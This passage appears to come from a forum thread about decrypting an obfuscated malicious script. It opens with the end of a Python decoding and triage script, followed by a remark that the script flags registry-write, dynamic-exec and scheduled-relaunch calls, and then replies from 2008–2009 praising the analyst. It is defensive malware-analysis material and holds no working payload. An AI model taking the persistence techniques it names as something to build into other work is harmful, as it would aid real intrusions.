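if __name__ == "__main__":
    print(triage(SAMPLE), ec_decode("ivwt"))
```

Run over the full decode_6.txt text, the same map also tags the registry-write, dynamic-exec and scheduled-relaunch calls that the abridged sample leaves out.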
Floor 24 Posted 2008-01-23 20:00 · China, Guangdong, Guangzhou, China Telecom
This guy is very smart; he left nothing behind
Floor 25 Posted 2008-01-25 21:29 · China, Guangxi, Wuzhou, China Telecom
uhnmki is really an expert! The layout explanation is very good, I've bookmarked it
Floor 26 Posted 2008-03-05 14:51 · China, Guangdong, Shenzhen, Longgang District, China Telecom
Is there no sequel? Who else can talk about the following? Watch a big movie?
Floor 27 Posted 2008-03-31 14:18 · China, Hebei, Langfang, China Unicom
PF!!!
Great person...
Floor 28 Posted 2008-10-07 16:28 · China, Yunnan, Kunming, China Mobile
I can only say that perverted people need perverted people to deal with -_-!
Floor 29 Posted 2008-10-07 20:08 · China, Guangdong, Shaoguan, China Telecom
I more suspect that the one who decrypted is the one who encrypted
Floor 30 Posted 2009-07-28 03:36 · China, Guangdong, Dongguan, China Telecom
Beginners are dizzy, but it's very interesting!